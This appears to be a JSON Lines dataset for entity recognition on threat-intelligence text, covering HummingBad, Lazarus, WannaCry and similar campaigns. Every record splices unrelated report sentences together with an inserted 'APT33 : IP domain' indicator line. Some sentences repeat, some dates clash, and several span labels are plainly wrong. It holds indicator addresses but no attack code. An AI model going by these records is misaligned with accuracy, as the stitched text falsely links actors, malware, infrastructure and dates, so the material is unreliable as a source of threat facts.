{"text": "Corrupted archive privapp.txt Looks like a list of system applications ( including spyware components ) from the infected device run-as.x run-as.y Run-as tool ELF file SuperSU config fragment for implant components and the busybox tool supersu.cfg : This config allows the implant to use all root features silently . DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity . APT33 : 8.26.21.120 mynetwork.ddns.net . The ThreatConnect Platform centralizes threat intelligence , automates key activities and enables information sharing across the internal security organization and with external partners .", "spans": [{"start": 18, "end": 29, "label": "Indicator"}, {"start": 129, "end": 137, "label": "Indicator"}, {"start": 138, "end": 146, "label": "Indicator"}, {"start": 236, "end": 247, "label": "Indicator"}, {"start": 317, "end": 320, "label": "Organization"}, {"start": 325, "end": 328, "label": "Organization"}, {"start": 455, "end": 460, "label": "Organization"}, {"start": 463, "end": 474, "label": "Indicator"}, {"start": 475, "end": 493, "label": "Indicator"}, {"start": 500, "end": 522, "label": "System"}]}
{"text": "Content of bdata.xml file : It can be added to the /system/etc/sysconfig/ path to allowlist specified implant components from the battery saving system . The malware known as RATANKBA is just one of the weapons in Lazarus ' arsenal . APT33 : 162.250.145.234 mynetwork.ddns.net . When it comes to Cuba and similar threats , access to highfidelity threat intelligence to help identify the highest risk , most actively exploitable vulnerabilities can help prioritization efforts when organizations are faced with a backlog of vulnerabilities to address .", "spans": [{"start": 51, "end": 73, "label": "Indicator"}, {"start": 175, "end": 183, "label": "System"}, {"start": 214, "end": 221, "label": "Organization"}, {"start": 234, "end": 239, "label": "Organization"}, {"start": 242, "end": 257, "label": "Indicator"}, {"start": 258, "end": 276, "label": "Indicator"}, {"start": 296, "end": 300, "label": "Organization"}]}
{"text": "Email account A Gmail account with password is mentioned in the sample \u2019 s code : It contains the victim \u2019 s exfiltrated data and \u201c cmd \u201d directory with commands for victim devices . We analyzed a new RATANKBA variant ( BKDR_RATANKBA.ZAEL\u2013A ) , discovered in June 2017 , that uses a PowerShell script instead of its more traditional PE executable form\u2014a version that other researchers also recently identified . APT33 : 91.235.142.76 mywinnetwork.ddns.net . If the target system met predefined requirements , the malware used Twitter to look for specific tweets from pre - made accounts created by MiniDuke \u2019s command and control ( C2 ) operators , with specific tags labeling encrypted URLs for backdoors .", "spans": [{"start": 16, "end": 21, "label": "System"}, {"start": 201, "end": 209, "label": "System"}, {"start": 220, "end": 240, "label": "System"}, {"start": 283, "end": 300, "label": "System"}, {"start": 412, "end": 417, "label": "Organization"}, {"start": 420, "end": 433, "label": "Indicator"}, {"start": 434, "end": 455, "label": "Indicator"}]}
{"text": "10 million Android phones infected by all-powerful auto-rooting apps First detected in November , Shedun/HummingBad infections are surging . Around 55% of the victims of Lazarus were located in India and neighboring countries . APT33 : 8.26.21.120 [REDACTED].ddns.net . Through this entry , in which we take a closer look at an individual who we believe might be connected to the Winnti group , we hope to give both ordinary users and organizations better insights into some of the tools \u2013 notably the server infrastructures- these kinds of threat actors use , as well as the scale in which they operate .", "spans": [{"start": 11, "end": 18, "label": "System"}, {"start": 98, "end": 115, "label": "Malware"}, {"start": 170, "end": 177, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 236, "end": 247, "label": "Indicator"}, {"start": 248, "end": 267, "label": "Indicator"}, {"start": 380, "end": 392, "label": "Organization"}, {"start": 416, "end": 430, "label": "Organization"}, {"start": 435, "end": 448, "label": "Organization"}, {"start": 482, "end": 487, "label": "System"}, {"start": 502, "end": 525, "label": "System"}, {"start": 541, "end": 554, "label": "Organization"}]}
{"text": "7/7/2016 , 1:50 PM Security experts have documented a disturbing spike in a particularly virulent family of Android malware , with more than 10 million handsets infected and more than 286,000 of them in the US . Lazarus group could have been active since late 2016 , was used in a recent campaign targeting financial institutions using watering hole attacks . APT33 : 8.26.21.120 [REDACTED].ddns.net . A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend .", "spans": [{"start": 108, "end": 115, "label": "System"}, {"start": 212, "end": 225, "label": "Organization"}, {"start": 307, "end": 329, "label": "Organization"}, {"start": 360, "end": 365, "label": "Organization"}, {"start": 368, "end": 379, "label": "Indicator"}, {"start": 380, "end": 399, "label": "Indicator"}, {"start": 404, "end": 408, "label": "Organization"}]}
{"text": "FURTHER READING New type of auto-rooting Android adware is nearly impossible to remove Researchers from security firm Check Point Software said the malware installs more than 50,000 fraudulent apps each day , displays 20 million malicious advertisements , and generates more than $ 300,000 per month in revenue . Since they first emerged back in 2007 with a series of cyberespionage attacks against the South Korean government , these threat actors have successfully managed to pull off some of the most notable and devastating targeted attacks\u2014such as the widely-reported 2014 Sony hack and the 2016 attack on a Bangladeshi bank\u2014in recent history . APT33 : 95.211.191.117 update-sec.com . None DGA Formula The algorithm for generating domains has been updated and includes the TLDs toplevel domains of .space , .net , .dynu.net , and .top to evade detection of security vendors using the previously published DGA domain generation algorithm", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 118, "end": 138, "label": "Organization"}, {"start": 416, "end": 426, "label": "Organization"}, {"start": 435, "end": 448, "label": "Organization"}, {"start": 650, "end": 655, "label": "Organization"}, {"start": 658, "end": 672, "label": "Indicator"}, {"start": 673, "end": 687, "label": "Indicator"}, {"start": 695, "end": 706, "label": "Indicator"}, {"start": 778, "end": 839, "label": "Indicator"}]}
{"text": "The success is largely the result of the malware 's ability to silently root a large percentage of the phones it infects by exploiting vulnerabilities that remain unfixed in older versions of Android . It 's possible that Lazarus is using RATANKBA to target larger organizations . APT33 : 5.187.21.70 microsoftupdated.com . On the left , the stolen credit card data is sent via a WebSocket skimmer while on the right , it is a POST request : In the past months there have been several Magecart skimmers abusing Google Tag Manager in one way or another .", "spans": [{"start": 135, "end": 199, "label": "Vulnerability"}, {"start": 222, "end": 229, "label": "Organization"}, {"start": 239, "end": 247, "label": "System"}, {"start": 281, "end": 286, "label": "Organization"}, {"start": 289, "end": 300, "label": "Indicator"}, {"start": 301, "end": 321, "label": "Indicator"}, {"start": 427, "end": 439, "label": "Indicator"}, {"start": 485, "end": 502, "label": "Malware"}, {"start": 511, "end": 529, "label": "System"}]}
{"text": "The Check Point researchers have dubbed the malware family \" HummingBad , '' but researchers from mobile security company Lookout say HummingBad is in fact Shedun , a family of auto-rooting malware that came to light last November and had already infected a large number of devices . RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders . APT33 : 217.13.103.46 securityupdated.com . By comparison , the INDUSTROYER.V2 incidents lacked many of those same disruptive components and the malware did not feature the wiper module from the original INDUSTROYER .", "spans": [{"start": 4, "end": 15, "label": "Organization"}, {"start": 61, "end": 71, "label": "Malware"}, {"start": 122, "end": 129, "label": "Organization"}, {"start": 134, "end": 144, "label": "Malware"}, {"start": 156, "end": 162, "label": "Malware"}, {"start": 284, "end": 292, "label": "System"}, {"start": 321, "end": 354, "label": "Malware"}, {"start": 367, "end": 393, "label": "System"}, {"start": 406, "end": 415, "label": "System"}, {"start": 453, "end": 458, "label": "Organization"}, {"start": 461, "end": 474, "label": "Indicator"}, {"start": 475, "end": 494, "label": "Indicator"}, {"start": 517, "end": 531, "label": "Malware"}, {"start": 598, "end": 605, "label": "Malware"}, {"start": 657, "end": 668, "label": "Malware"}]}
{"text": "Update Jul 11 2016 8:32 : On Monday , a Checkpoint representative disputed Lookout 's contention and pointed to this blog post from security firm Eleven Paths as support . Overall , an organization will need multilayered security strategies , as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses . APT33 : 8.26.21.120 [REDACTED].ddns.net . The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname \u201c PIG GOD\u201d\u2014another", "spans": [{"start": 40, "end": 50, "label": "Organization"}, {"start": 75, "end": 82, "label": "Organization"}, {"start": 146, "end": 158, "label": "Organization"}, {"start": 246, "end": 253, "label": "Organization"}, {"start": 272, "end": 278, "label": "Organization"}, {"start": 295, "end": 309, "label": "Organization"}, {"start": 380, "end": 385, "label": "Organization"}, {"start": 388, "end": 399, "label": "Indicator"}, {"start": 400, "end": 419, "label": "Indicator"}, {"start": 422, "end": 540, "label": "Indicator"}]}
{"text": "The blog post said HummingBad \" uses a completely different infrastructure with little in common '' with Shedun . simultaneous use of the detected Win32/KillDisk.NBO variants . APT33 : 5.187.21.71 backupnet.ddns.net . In some instances , two randomly generated bytes are added to the end of the file , which invalidates the detection of the dropped files using simple checksum - based techniques .", "spans": [{"start": 19, "end": 29, "label": "Malware"}, {"start": 147, "end": 165, "label": "System"}, {"start": 177, "end": 182, "label": "Organization"}, {"start": 185, "end": 196, "label": "Indicator"}, {"start": 197, "end": 215, "label": "Indicator"}, {"start": 368, "end": 395, "label": "System"}]}
{"text": "In an e-mail , a Lookout representative stood by its analysis and said company researchers planned to publish an in-depth response in the coming days . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government \u2013 commonly known as HARDRAIN . APT33 : 91.230.121.143 backupnet.ddns.net . The ads are very similar to other brand impersonation campaigns .", "spans": [{"start": 17, "end": 24, "label": "Organization"}, {"start": 165, "end": 180, "label": "Organization"}, {"start": 192, "end": 195, "label": "Organization"}, {"start": 200, "end": 203, "label": "Organization"}, {"start": 215, "end": 229, "label": "System"}, {"start": 295, "end": 303, "label": "System"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 314, "end": 328, "label": "Indicator"}, {"start": 329, "end": 347, "label": "Indicator"}, {"start": 384, "end": 413, "label": "Organization"}]}
{"text": "For the past five months , Check Point researchers have quietly observed the China-based advertising company behind HummingBad in several ways , including by infiltrating the command and control servers it uses . These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections . APT33 : 8.26.21.119 [REDACTED].ddns.net . Its demands for ransom have exceeded 145 million , with collections exceeding 60 million .", "spans": [{"start": 27, "end": 38, "label": "Organization"}, {"start": 116, "end": 126, "label": "Malware"}, {"start": 248, "end": 256, "label": "Malware"}, {"start": 261, "end": 276, "label": "Malware"}, {"start": 279, "end": 292, "label": "Malware"}, {"start": 297, "end": 318, "label": "Malware"}, {"start": 321, "end": 325, "label": "System"}, {"start": 330, "end": 360, "label": "Malware"}, {"start": 379, "end": 410, "label": "Malware"}, {"start": 417, "end": 446, "label": "Malware"}, {"start": 479, "end": 484, "label": "Organization"}, {"start": 487, "end": 498, "label": "Indicator"}, {"start": 499, "end": 518, "label": "Indicator"}]}
{"text": "The researchers say the malware uses the unusually tight control it gains over infected devices to create windfall profits and steadily increase its numbers . The cybercriminal group Lazarus has a history of attacking financial organizations in Asia and Latin America . APT33 : 8.26.21.117 srvhost.servehttp.com . \" Indicators of attack IoAs refer to the series of behaviors that a cybercriminal exhibits prior to executing a cyberattack .", "spans": [{"start": 163, "end": 182, "label": "Organization"}, {"start": 183, "end": 190, "label": "Organization"}, {"start": 218, "end": 241, "label": "Organization"}, {"start": 270, "end": 275, "label": "Organization"}, {"start": 278, "end": 289, "label": "Indicator"}, {"start": 290, "end": 311, "label": "Indicator"}, {"start": 316, "end": 336, "label": "Indicator"}, {"start": 337, "end": 341, "label": "Indicator"}, {"start": 355, "end": 437, "label": "Indicator"}]}
{"text": "HummingBad does this by silently installing promoted apps on infected phones , defrauding legitimate mobile advertisers , and creating fraudulent statistics inside the official Google Play Store . We also recently discovered that Lazarus successfully planted their backdoor ( detected by Trend Micro as BKDR_BINLODR.ZNFJ-A ) into several machines of financial institutions across Latin America . APT33 : 37.48.105.178 servhost.hopto.org . Others include Excel spreadsheets that contain socially engineered instructions on how to enable macros in Excel so that the malicious VBA code can be executed .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 177, "end": 194, "label": "System"}, {"start": 230, "end": 237, "label": "Organization"}, {"start": 288, "end": 299, "label": "Organization"}, {"start": 303, "end": 322, "label": "System"}, {"start": 350, "end": 372, "label": "Organization"}, {"start": 396, "end": 401, "label": "Organization"}, {"start": 404, "end": 417, "label": "Indicator"}, {"start": 418, "end": 436, "label": "Indicator"}, {"start": 454, "end": 518, "label": "Organization"}, {"start": 529, "end": 598, "label": "Organization"}]}
{"text": "\" Accessing these devices and their sensitive data creates a new and steady stream of revenue for cybercriminals , '' Check Point researchers wrote in a recently published report . We determined that these backdoors were installed on the targets ' machines on September 19 2018 , based mainly on the service creation time of the loader component . APT33 : 8.26.21.117 srvhost.servehttp.com . The login , as mentioned above , was also designed to look legitimate .", "spans": [{"start": 348, "end": 353, "label": "Organization"}, {"start": 356, "end": 367, "label": "Indicator"}, {"start": 368, "end": 389, "label": "Indicator"}]}
{"text": "\" Emboldened by financial and technological independence , their skillsets will advance\u2013putting end users , enterprises , and government agencies at risk . Just last week Lazarus were found stealing millions from ATMs across Asia and Africa . APT33 : 5.187.21.70 microsoftupdated.com . This seeming \u201c streamlining \u201d of activities by DPRK often makes it difficult for defenders to track , attribute , and thwart malicious activities , while enabling this now collaborative adversary to move stealthily and with greater speed .", "spans": [{"start": 171, "end": 178, "label": "Organization"}, {"start": 243, "end": 248, "label": "Organization"}, {"start": 251, "end": 262, "label": "Indicator"}, {"start": 263, "end": 283, "label": "Indicator"}]}
{"text": "'' The report said HummingBad apps are developed by Yingmob , a Chinese mobile ad server company that other researchers claim is behind the Yinspector iOS malware . These and other tools used by the Lazarus group can be mitigated by routinely scanning the network for any malicious activity to help prevent the malware from entering and spreading through an organization . APT33 : 64.251.19.214 mynetwork.ddns.net . To perform analysis of NetScaler memory core dump files , they need to be collected .", "spans": [{"start": 19, "end": 29, "label": "Malware"}, {"start": 52, "end": 59, "label": "Organization"}, {"start": 140, "end": 150, "label": "Malware"}, {"start": 151, "end": 154, "label": "System"}, {"start": 199, "end": 212, "label": "Organization"}, {"start": 373, "end": 378, "label": "Organization"}, {"start": 381, "end": 394, "label": "Indicator"}, {"start": 395, "end": 413, "label": "Indicator"}, {"start": 439, "end": 471, "label": "System"}]}
{"text": "HummingBad sends notifications to Umeng , a tracking and analytics service attackers use to manage their campaign . The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more . APT33 : 64.251.19.217 [REDACTED].servehttp.com . Cuba ransomware was first observed in 2019 .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 130, "end": 137, "label": "Organization"}, {"start": 232, "end": 243, "label": "Organization"}, {"start": 255, "end": 264, "label": "Organization"}, {"start": 332, "end": 337, "label": "Organization"}, {"start": 340, "end": 353, "label": "Indicator"}, {"start": 354, "end": 378, "label": "Indicator"}, {"start": 381, "end": 396, "label": "Malware"}]}
{"text": "Check Point analyzed Yingmob \u2019 s Umeng account to gain further insights into the HummingBad campaign and found that beyond the 10 million devices under the control of malicious apps , Yingmob has non-malicious apps installed on another 75 million or so devices . Trend Micro endpoint solutions such as Trend Micro\u2122 Smart Protection Suites and Worry-Free\u2122 Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs . APT33 : 64.251.19.214 [REDACTED].ddns.net . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 21, "end": 28, "label": "Organization"}, {"start": 81, "end": 91, "label": "Malware"}, {"start": 184, "end": 191, "label": "Organization"}, {"start": 263, "end": 274, "label": "Organization"}, {"start": 302, "end": 338, "label": "Organization"}, {"start": 343, "end": 372, "label": "Organization"}, {"start": 395, "end": 405, "label": "Organization"}, {"start": 438, "end": 453, "label": "Malware"}, {"start": 524, "end": 529, "label": "Organization"}, {"start": 532, "end": 545, "label": "Indicator"}, {"start": 546, "end": 565, "label": "Indicator"}, {"start": 572, "end": 599, "label": "Organization"}, {"start": 665, "end": 694, "label": "Organization"}]}
{"text": "The researchers wrote : While profit is powerful motivation for any attacker , Yingmob \u2019 s apparent self-sufficiency and organizational structure make it well-positioned to expand into new business ventures , including productizing the access to the 85 million Android devices it controls . FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation . APT33 : 64.251.19.214 mynetwork.ddns.net . Another example would be that of a person selling illicit products on the dark web .", "spans": [{"start": 79, "end": 86, "label": "Organization"}, {"start": 261, "end": 268, "label": "System"}, {"start": 291, "end": 294, "label": "Organization"}, {"start": 320, "end": 339, "label": "Organization"}, {"start": 481, "end": 486, "label": "Organization"}, {"start": 489, "end": 502, "label": "Indicator"}, {"start": 503, "end": 521, "label": "Indicator"}]}
{"text": "This alone would attract a whole new audience\u2013and a new stream of revenue\u2013for Yingmob . Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . APT33 : 64.251.19.214 [REDACTED].sytes.net . The Stuxnet Virus identified in 2010 that was used to destroy the Iranian centrifuges is but one relevant example of such a motivation .", "spans": [{"start": 78, "end": 85, "label": "Organization"}, {"start": 130, "end": 138, "label": "System"}, {"start": 145, "end": 149, "label": "System"}, {"start": 157, "end": 168, "label": "System"}, {"start": 346, "end": 364, "label": "Organization"}, {"start": 367, "end": 375, "label": "Organization"}, {"start": 378, "end": 395, "label": "Organization"}, {"start": 398, "end": 410, "label": "Organization"}, {"start": 415, "end": 437, "label": "Organization"}, {"start": 455, "end": 460, "label": "Organization"}, {"start": 463, "end": 476, "label": "Indicator"}, {"start": 477, "end": 497, "label": "Indicator"}, {"start": 500, "end": 517, "label": "Malware"}, {"start": 566, "end": 585, "label": "Organization"}]}
{"text": "Quick , easy access to sensitive data on mobile devices connected to enterprises and government agencies around the globe is extremely attractive to cybercriminals and hacktivists . Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . APT33 : 64.251.19.217 [REDACTED].myftp.org . STRATOFEAR also contains strings that are used to report a module \u2019s location .", "spans": [{"start": 224, "end": 232, "label": "System"}, {"start": 239, "end": 243, "label": "System"}, {"start": 251, "end": 262, "label": "System"}, {"start": 440, "end": 458, "label": "Organization"}, {"start": 461, "end": 469, "label": "Organization"}, {"start": 472, "end": 489, "label": "Organization"}, {"start": 492, "end": 504, "label": "Organization"}, {"start": 509, "end": 531, "label": "Organization"}, {"start": 549, "end": 554, "label": "Organization"}, {"start": 557, "end": 570, "label": "Indicator"}, {"start": 571, "end": 591, "label": "Indicator"}, {"start": 594, "end": 604, "label": "Malware"}, {"start": 610, "end": 671, "label": "Malware"}]}
{"text": "Drive-by downloads and multiple rooting exploits The malware uses a variety of methods to infect devices . We also saw that the attack technique bears some resemblance to a previous 2017 Lazarus attack , analyzed by BAE Systems , against targets in Asia . APT33 : 64.251.19.216 srvhost.servehttp.com . The next step is to collect some information about the victim system to send them to the C2 server .", "spans": [{"start": 216, "end": 227, "label": "Organization"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 264, "end": 277, "label": "Indicator"}, {"start": 278, "end": 299, "label": "Indicator"}, {"start": 322, "end": 386, "label": "Malware"}, {"start": 391, "end": 400, "label": "System"}]}
{"text": "One involves drive-by downloads , possibly on booby-trapped porn sites . WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system . APT33 : 64.251.19.217 [REDACTED].myftp.org . The encrypted files contain a marker string 0x666 followed by the data appended by the ransomware .", "spans": [{"start": 73, "end": 81, "label": "System"}, {"start": 91, "end": 102, "label": "Vulnerability"}, {"start": 124, "end": 127, "label": "System"}, {"start": 196, "end": 201, "label": "Organization"}, {"start": 204, "end": 217, "label": "Indicator"}, {"start": 218, "end": 238, "label": "Indicator"}, {"start": 245, "end": 290, "label": "Indicator"}, {"start": 307, "end": 338, "label": "Indicator"}]}
{"text": "The attacks use multiple exploits in an attempt to gain root access on a device . Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 . APT33 : 64.251.19.217 [REDACTED].myftp.org . Additionally we observed the DPRK threat actor log directly into a Pyongyang IP , from one of their jump boxes .", "spans": [{"start": 154, "end": 162, "label": "System"}, {"start": 277, "end": 282, "label": "Organization"}, {"start": 285, "end": 298, "label": "Indicator"}, {"start": 299, "end": 319, "label": "Indicator"}, {"start": 351, "end": 368, "label": "Organization"}, {"start": 387, "end": 401, "label": "System"}]}
{"text": "When rooting fails , a second component delivers a fake system update notification in hopes of tricking users into granting HummingBad system-level permissions . WannaCry ( also known as WCry or WanaCryptor ) malware is a self-propagating ( worm-like ) ransomware that spreads through internal networks and over the public internet by exploiting a vulnerability in Microsoft 's Server Message Block ( SMB ) protocol , MS17-010 . APT33 : 64.251.19.215 [REDACTED].myftp.org . The group 's 91 attacks come not long after their extensive GoAnywhere campaign in March , when they hit over 100 organizations using a nasty zero - day .", "spans": [{"start": 124, "end": 134, "label": "Malware"}, {"start": 162, "end": 170, "label": "System"}, {"start": 187, "end": 191, "label": "System"}, {"start": 195, "end": 206, "label": "System"}, {"start": 253, "end": 263, "label": "System"}, {"start": 365, "end": 374, "label": "Organization"}, {"start": 378, "end": 398, "label": "System"}, {"start": 401, "end": 404, "label": "System"}, {"start": 429, "end": 434, "label": "Organization"}, {"start": 437, "end": 450, "label": "Indicator"}, {"start": 451, "end": 471, "label": "Indicator"}, {"start": 474, "end": 497, "label": "Organization"}, {"start": 534, "end": 544, "label": "Organization"}, {"start": 610, "end": 626, "label": "Malware"}]}
{"text": "Whether or not rooting succeeds , HummingBad downloads a large number of apps . The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities . APT33 : 64.251.19.217 [REDACTED].myftp.org . Here are some reasons why : \u2022 No WebSocket being used To complicate things , we observed some stores that had both skimmers at the same time , which is another reason why we believe they are not related : We started calling this new skimmer ' Kritec ' after one of its domain names .", "spans": [{"start": 34, "end": 44, "label": "Malware"}, {"start": 84, "end": 100, "label": "System"}, {"start": 148, "end": 181, "label": "Malware"}, {"start": 207, "end": 218, "label": "Malware"}, {"start": 260, "end": 263, "label": "System"}, {"start": 292, "end": 297, "label": "Organization"}, {"start": 300, "end": 313, "label": "Indicator"}, {"start": 314, "end": 334, "label": "Indicator"}, {"start": 370, "end": 379, "label": "System"}, {"start": 431, "end": 437, "label": "Indicator"}, {"start": 452, "end": 460, "label": "Malware"}, {"start": 570, "end": 577, "label": "Malware"}, {"start": 580, "end": 586, "label": "Malware"}]}
{"text": "In some cases , malicious components are dynamically downloaded onto a device after an infected app is installed . WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 . APT33 : 64.251.19.216 [REDACTED].myftp.org . Notably , there were no overlaps in infrastructure between these clusters of activity .", "spans": [{"start": 115, "end": 123, "label": "System"}, {"start": 159, "end": 170, "label": "Vulnerability"}, {"start": 200, "end": 214, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}, {"start": 244, "end": 257, "label": "Indicator"}, {"start": 258, "end": 278, "label": "Indicator"}, {"start": 302, "end": 366, "label": "Indicator"}]}
{"text": "From there , infected phones display illegitimate ads and install fraudulent apps after certain events , such as rebooting , the screen turning on or off , a detection that the user is present , or a change in Internet connectivity . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . APT33 : 64.251.19.232 mynetwork.ddns.net . They also list nebiltech[.]shop in their IOCs which is a domain we sometimes saw injected near the Google Tag Manager script , but not within it .", "spans": [{"start": 234, "end": 242, "label": "System"}, {"start": 281, "end": 286, "label": "Malware"}, {"start": 299, "end": 334, "label": "Malware"}, {"start": 404, "end": 409, "label": "Organization"}, {"start": 412, "end": 425, "label": "Indicator"}, {"start": 426, "end": 444, "label": "Indicator"}, {"start": 462, "end": 478, "label": "Indicator"}, {"start": 546, "end": 571, "label": "Malware"}]}
{"text": "HummingBad also has the ability to inject code into Google Play to tamper with its ratings and statistics . In May 2017 , SecureWorks\u00ae Counter Threat Unit\u00ae ( CTU ) researchers investigated a widespread and opportunistic WCry ( also known as WanaCry , WanaCrypt , and Wana Decrypt0r ) ransomware campaign that impacted many systems around the world . APT33 : 64.251.19.214 [REDACTED].ddns.net . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 52, "end": 63, "label": "System"}, {"start": 122, "end": 155, "label": "Organization"}, {"start": 158, "end": 161, "label": "Organization"}, {"start": 220, "end": 224, "label": "System"}, {"start": 350, "end": 355, "label": "Organization"}, {"start": 358, "end": 371, "label": "Indicator"}, {"start": 372, "end": 391, "label": "Indicator"}, {"start": 544, "end": 569, "label": "Organization"}]}
{"text": "It does this by using infected devices to imitate clicks on the install , buy , and accept buttons . In November 2017 , SecureWorks Counter Threat Unit ( CTU ) researchers investigated a widespread and opportunistic WCry ransomware campaign that impacted many systems around the world . APT33 : 162.250.145.204 mynetwork.ddns.net . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": [{"start": 120, "end": 151, "label": "Organization"}, {"start": 154, "end": 157, "label": "Organization"}, {"start": 287, "end": 292, "label": "Organization"}, {"start": 295, "end": 310, "label": "Indicator"}, {"start": 311, "end": 329, "label": "Indicator"}, {"start": 332, "end": 363, "label": "Organization"}, {"start": 409, "end": 460, "label": "Organization"}]}
{"text": "Many of the 10 million infected phones are running old versions of Android and reside in China ( 1.6 million ) and India ( 1.35 million ) . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 . APT33 : 188.165.4.81 svcexplores.com . The MOVEit data breaches had widespread impacts , affecting everything from the Oregon DMV and Louisiana OMV ( Office of Motor Vehicles)\u2014including the leak of nearly 10 million drivers ' licenses \u2014 to the University of Rochester and multiple corporations .", "spans": [{"start": 67, "end": 74, "label": "System"}, {"start": 140, "end": 149, "label": "Organization"}, {"start": 164, "end": 185, "label": "Vulnerability"}, {"start": 234, "end": 239, "label": "Organization"}, {"start": 242, "end": 254, "label": "Indicator"}, {"start": 255, "end": 270, "label": "Indicator"}, {"start": 277, "end": 283, "label": "System"}, {"start": 478, "end": 501, "label": "Organization"}, {"start": 506, "end": 527, "label": "Organization"}]}
{"text": "Still , US-based infected phones total almost 287,000 . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April . APT33 : 64.251.19.231 mynetwork.ddns.net . The goal of UNC1945 is currently unknown because Mandiant has not been able to observe the activities that followed UNC1945 compromises .", "spans": [{"start": 78, "end": 91, "label": "Vulnerability"}, {"start": 135, "end": 149, "label": "Organization"}, {"start": 150, "end": 162, "label": "Organization"}, {"start": 174, "end": 179, "label": "Organization"}, {"start": 182, "end": 195, "label": "Indicator"}, {"start": 196, "end": 214, "label": "Indicator"}, {"start": 229, "end": 236, "label": "Organization"}, {"start": 266, "end": 274, "label": "Organization"}, {"start": 333, "end": 340, "label": "Organization"}]}
{"text": "The most widely infected major Android versions are KitKat with 50 percent , followed by Jelly Bean with 40 percent . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . APT33 : 64.251.19.231 [REDACTED].ddns.net . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": [{"start": 31, "end": 38, "label": "System"}, {"start": 52, "end": 58, "label": "System"}, {"start": 89, "end": 99, "label": "System"}, {"start": 125, "end": 146, "label": "System"}, {"start": 173, "end": 181, "label": "System"}, {"start": 226, "end": 251, "label": "Vulnerability"}, {"start": 254, "end": 259, "label": "Organization"}, {"start": 262, "end": 275, "label": "Indicator"}, {"start": 276, "end": 295, "label": "Indicator"}]}
{"text": "Lollipop has 7 percent , Ice Cream Sandwich has 2 percent , and Marshmallow has 1 percent . WCry uses a combination of the RSA and AES algorithms to encrypt files . APT33 : 64.251.19.232 [REDACTED].ddns.net . In essence , this provides the threat actor unrestricted access to the account .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 25, "end": 43, "label": "System"}, {"start": 64, "end": 75, "label": "System"}, {"start": 92, "end": 96, "label": "System"}, {"start": 123, "end": 126, "label": "System"}, {"start": 131, "end": 134, "label": "System"}, {"start": 149, "end": 162, "label": "Malware"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 173, "end": 186, "label": "Indicator"}, {"start": 187, "end": 206, "label": "Indicator"}]}
{"text": "It 's often hard for average users to know if their phones have been rooted , and Shedun apps often wait some period of time before displaying obtrusive ads or installing apps . The campaign 's use of an SMB worm to distribute WCry contributed to the ransomware 's virulence . APT33 : 64.251.19.216 [REDACTED].myftp.biz . Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n\u2019t happening any time soon .", "spans": [{"start": 82, "end": 88, "label": "Malware"}, {"start": 204, "end": 212, "label": "System"}, {"start": 227, "end": 231, "label": "System"}, {"start": 277, "end": 282, "label": "Organization"}, {"start": 285, "end": 298, "label": "Indicator"}, {"start": 299, "end": 319, "label": "Indicator"}, {"start": 344, "end": 349, "label": "Malware"}, {"start": 354, "end": 363, "label": "Malware"}]}
